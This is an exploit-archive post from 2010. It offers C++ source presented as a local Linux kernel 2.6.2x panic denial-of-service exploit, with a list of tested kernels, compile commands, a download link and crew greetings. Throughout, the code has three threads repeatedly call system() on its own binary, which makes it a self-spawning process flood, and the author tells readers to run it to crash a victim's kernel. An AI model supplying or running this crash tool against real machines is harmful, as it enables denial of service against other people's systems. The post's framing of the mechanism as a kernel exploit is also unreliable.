============================================ Local kernel 2.6.2x kernel panic via pthread ============================================
# Exploit Title: Pthread Local Kernel 2.6.2x Kernel Panic Exploit # Date: 20 April 2010 # Author: mywisdom # Organizationdevilzc0de.org , goldhaxors.com , jasakom.com, jatimcrew.org, darkc0de.com,solhack 2003-2004) # Country: Indonesia # Software Link: http://www.kernel.org/pub/linux/kernel/v2.6/ # Version: Kernel 2.6.2x # Platform / Tested on: - Linux Kernel 2.6.22-14-Generic #4 (crash) - Linux Kernel #2 (crash) - Linux Kernel 2.6.18-128.2.1.el5.028stab064.7 #1 SMP (failed) - Slitaz-Cooking Linux (Kernel 2.6.30) (crash) - Backtrack 3 (Kernel #4 SMP) (crash)
# category: local, dos/poc, etc #temporary download: http://yoyoparty.com/upload/devilzc0de.cpp (you may delete this boss) # Code :
/*** filename: devilzc0de.cpp (do not change this to work!!!) devilzc0de private local kernel 2.6.2x kernel panic via pthread c0d3r: mywisdom (solhack 2004 c0d3r, devilzc0de c0d3r 2010) do visit: www.devilzc0de.org www.goldhaxors.com www.inj3ct0r.com compile using D_REERANT : g++ -o devilzc0de devilzc0de.cpp -lpthread -D_REENTRANT
special thanks to: goldhaxors crews and members more thanks to :Inj3ct0r (http://inj3ct0r.com/), r0073r, devilzc0de crews and members,yogyacarderlink crews and members, jatimcrew crews and members, hackernewbie crews and members,fasthacker crews and members and so on greets: Danzel,unkn0wn,x-n3t very special thanks to my beloved girl: juliana a.k.a vilecen a.k.a prisciela mariebeth greets2: gunslinger, flyv666,kiddies, petimati,xtr0nic,whitehat,cr4wl3r,EA ANGEL,gblack,v3n0m,d3xt3r,chaer newbie,blu3k1d (dark shine),linggah,yadoy666,aurel666,devil nongkrong,ki lurah,z0mb13,byz999,iblis muda,7460,edelweiss,pokeng rootboy,n0ge,stardustmemory,angela zhang,fasthacker,hendri note,kingkong,thitha, nur si sister chubby,etc... yang ketingalan namanya maaf yah laen kali masih ada lagi exploit laen greets to my old friends: evidence,getch,foxx at solhack 2003-2004 compile : g++ -o devilzc0de devilzc0de.cpp -lpthread -D_REENTRANT and then run to crash your victim's kernel: ./devilzc0de :-P regards mywisdom ***/ #include <features.h> #include <sys/select.h> #include <sys/ioctl.h> #include <termios.h> #include <stropts.h> #include <iostream> #include <pthread.h> #include <stdio.h> #include <stdlib.h>
int _fuck() { static bool mulai = false; //STDIN static const int STDIN = 0;
if (!mulai) { termios gunslinger; tcgetattr(STDIN, &gunslinger); gunslinger.c_lflag &= ~ICANON; tcsetattr(STDIN, TCSANOW, &gunslinger); setbuf(stdin, NULL); mulai = true; }
int hack; ioctl(STDIN, FIONREAD, &hack); return hack; }
using namespace std;
int mywisdom = false;
void * eksploitasi(void *generic_pointer) { while (!mywisdom) { //starting kernel panic printf("..pthread creating..please wait..crashing.."); system("./devilzc0de");
pthread_yield(); } return NULL; }
int main() {
pthread_t tretid1; pthread_t tretid2; pthread_t tretid3;
//thread cukup buat bikin mampus pthread_create(&tretid1, NULL, eksploitasi, NULL); pthread_create(&tretid2, NULL, eksploitasi, NULL); pthread_create(&tretid3, NULL, eksploitasi, NULL); while (!_fuck()) { pthread_yield(); } mywisdom = false;
return 0; }